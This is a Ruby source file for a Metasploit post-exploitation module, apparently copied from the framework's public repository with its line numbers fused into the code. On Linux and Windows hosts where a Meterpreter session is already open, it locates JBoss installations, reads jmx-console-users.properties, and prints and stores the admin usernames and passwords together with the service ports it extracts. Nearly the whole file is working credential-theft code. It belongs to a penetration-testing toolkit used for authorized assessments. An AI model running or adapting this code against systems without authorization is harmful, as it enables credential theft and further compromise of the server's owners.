Path: blob/master/modules/post/multi/gather/jboss_gather.rb
19715 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'nokogiri'67class MetasploitModule < Msf::Post8include Msf::Post::File9include Msf::Post::Linux::System1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'JBoss Credential Collector',16'Description' => %q{17This module can be used to extract the JBoss admin passwords for version 4, 5 and 6.18},19'License' => MSF_LICENSE,20'Author' => [ 'Koen Riepe ([email protected])' ],21'Platform' => [ 'linux', 'win' ],22'SessionTypes' => [ 'meterpreter' ],23'Notes' => {24'Stability' => [CRASH_SAFE],25'SideEffects' => [],26'Reliability' => []27}28)29)30end3132def report_creds(user, pass, port)33return if user.empty? || pass.empty?3435# Assemble data about the credential objects we will be creating36credential_data = {37origin_type: :session,38post_reference_name: fullname,39private_data: pass,40private_type: :password,41session_id: session_db_id,42username: user,43workspace_id: myworkspace_id44}4546credential_core = create_credential(credential_data)4748if !port.is_a?(Integer)49print_error('Failed to detect port, defaulting to 8080 for creds database')50port = 808051end5253login_data = {54core: credential_core,55status: Metasploit::Model::Login::Status::UNTRIED,56address: ::Rex::Socket.getaddress(session.sock.peerhost, true),57port: port,58service_name: 'jboss',59protocol: 'tcp',60workspace_id: myworkspace_id61}62create_credential_login(login_data)63end6465def getpw(file, ports)66i = 067file.each do |pwfile|68begin69print_status("Getting passwords from: #{pwfile}")70lines = read_file(pwfile).split("\n")71rescue StandardError72print_error("Cannot open #{pwfile}, you probably do not have permissions to open the file.")73next74end75for line in lines76next if line.include? '#'7778creds = line.split('=')79print_good("Credentials found - Username: #{creds[0]} Password: #{creds[1]}")80report_creds(creds[0], creds[1], ports[i])81end82i += 183end84end8586def getversion(array)87i = 088version = 'NONE'89results = []90while i < array.count91downcase = array[i].downcase92if downcase.include? 'jboss'93begin94file = read_file(array[i])95rescue StandardError96print_error("Cannot open #{array[i]}, you probably do not have permissions to open the file.")97next98end99xml_doc = Nokogiri::XML(file)100xml_doc.xpath('//jar-versions//jar').each do |node|101if node['name'] == 'jbossweb.jar'102version = node['specVersion'][0]103results.push(version)104end105end106end107if version != 'NONE'108print_status("Found a JBoss installation version: #{version}")109home = readhome(cmd_exec('printenv').split("\n"))110pwfiles = getpwfiles(cmd_exec('locate jmx-console-users.properties').split("\n"), home, version)111listenports = getports(version)112getpw(pwfiles, listenports)113end114i += 1115end116end117118def wingetversion(array, home)119i = 0120version = 'NONE'121results = []122while i < array.count123downcase = array[i].downcase124if downcase.include? 'jboss'125file = read_file(array[i])126xml_doc = Nokogiri::XML(file)127xml_doc.xpath('//jar-versions//jar').each do |node|128if node['name'] == 'jbossweb.jar'129version = node['specVersion'][0]130results.push(version)131end132end133end134if version != 'NONE'135print_status("Found a JBoss installation version: #{version}")136instances = wingetinstances(home, version)137pwfiles = winpwfiles(instances)138listenports = wingetport(instances)139getpw(pwfiles, listenports)140end141i += 1142end143end144145def readhome(array)146home = ''147array.each do |item|148if item.include? 'JBOSS_HOME'149home = item.split('JBOSS_HOME=')[1]150end151end152return home153end154155def getpwfiles(array, home, version)156pwfiles = []157array.each do |location|158if location.include?(home && version)159pwfiles.push(location)160end161end162return pwfiles163end164165def getports(version)166type1 = cmd_exec('locate bindings-jboss-beans.xml').split("\n")167type2 = cmd_exec('locate jboss-web.deployer/server.xml').split("\n")168port = []169type1.each do |file1|170next unless file1 && file1.include?(version)171172print_status("Attempting to extract JBoss service ports from: #{file1}")173begin174file1_read = read_file(file1).split("\n")175rescue StandardError176print_error("Cannot open #{file1}, you probably do not have permissions to open the file.")177next178end179parse = false180portfound = false181file1_read.each do |line|182if line.strip.include? 'deploy/httpha-invoker.sar'183parse = true184elsif (line.strip == '</bean>') && portfound185parse = false186elsif parse && line.include?('<property name="port">')187portnr = line.split('<property name="port">')[1].split('<')[0].to_i188port.push(portnr)189portfound = true190print_good("JBoss port found: #{portnr}")191end192end193end194195type2.each do |file2|196next unless file2 && file2.include?(version)197198print_status("Attempting to extract JBoss service ports from: #{file2}")199begin200xml2 = Nokogiri::XML(read_file(file2))201rescue StandardError202print_error("Cannot open #{file2}, you probably do not have permissions to open the file.")203next204end205xml2.xpath('//Server//Connector').each do |connector|206next unless connector['protocol'].include? 'HTTP'207208portnr = connector['port'].to_i209port.push(portnr)210print_good("JBoss port found: #{portnr}")211break212end213end214return port215end216217def gathernix218print_status('Unix OS detected, attempting to locate JBoss services')219getversion(cmd_exec('locate jar-versions.xml').split("\n"))220end221222def winhome223home = []224exec = cmd_exec('WMIC PROCESS get Caption,Commandline').split("\n")225exec.each do |line|226next unless line.downcase.include?('java.exe') && line.downcase.include?('jboss')227228print_status('JBoss service found')229parse = line.split('-classpath "')[1].split('\\bin\\')[0]230if parse[0] == ';'231home.push(parse.split(';')[1])232else233home.push(parse)234end235end236return home237end238239def wingetinstances(home, version)240instances = []241instance_location = "#{home}\\server"242exec = cmd_exec("cmd /c dir #{instance_location}").split("\n")243exec.each do |instance|244next unless instance.split('<DIR>')[1] && ((!instance.split('<DIR>')[1].strip.include? '.') && (!instance.split('<DIR>')[1].strip.include? '..'))245246instance_path = "#{home}\\server\\#{instance.split('<DIR>')[1].strip}"247if instance_path.include? version248instances.push(instance_path)249end250end251return instances252end253254def winpwfiles(instances)255files = []256instances.each do |seed|257file_path = "#{seed}\\conf\\props\\jmx-console-users.properties"258if exist?(file_path)259files.push(file_path)260end261end262return files263end264265def wingetport(instances)266port = []267instances.each do |seed|268path1 = "#{seed}\\conf\\bindingservice.beans\\META-INF\\bindings-jboss-beans.xml"269path2 = "#{seed}\\deploy\\jboss-web.deployer\\server.xml"270271if exist?(path1)272file1 = read_file("#{seed}\\conf\\bindingservice.beans\\META-INF\\bindings-jboss-beans.xml").split("\n")273end274275if exist?(path2)276file2 = read_file("#{seed}\\deploy\\jboss-web.deployer\\server.xml")277end278279if file1280print_status("Attempting to extract JBoss service ports from: #{seed}\\conf\\bindingservice.beans\\META-INF\\bindings-jboss-beans.xml")281parse = false282portfound = false283file1.each do |line|284if line.strip.include? 'deploy/httpha-invoker.sar'285parse = true286elsif (line.strip == '</bean>') && portfound287parse = false288elsif parse && line.include?('<property name="port">')289portnr = line.split('<property name="port">')[1].split('<')[0].to_i290port.push(portnr)291portfound = true292print_good("JBoss port found: #{portnr}")293end294end295end296297next unless file2298299print_status("Attempting to extract JBoss service ports from: #{seed}\\deploy\\jboss-web.deployer\\server.xml")300xml2 = Nokogiri::XML(file2)301xml2.xpath('//Server//Connector').each do |connector|302next unless connector['protocol'].include? 'HTTP'303304portnr = connector['port'].to_i305port.push(portnr)306print_good("JBoss port found: #{portnr}")307break308end309end310return port311end312313def gatherwin314print_status('Windows OS detected, enumerating services')315home_array = winhome316317if home_array.empty?318print_status('No JBoss service has been found')319return320end321322home_array.each do |home|323version_file = []324version_file.push("#{home}\\jar-versions.xml")325wingetversion(version_file, home)326end327end328329def run330if sysinfo['OS'].include?('Windows')331gatherwin332else333gathernix334end335rescue StandardError336print_error('sysinfo function not available, you are probably using a wrong meterpreter.')337end338end339340341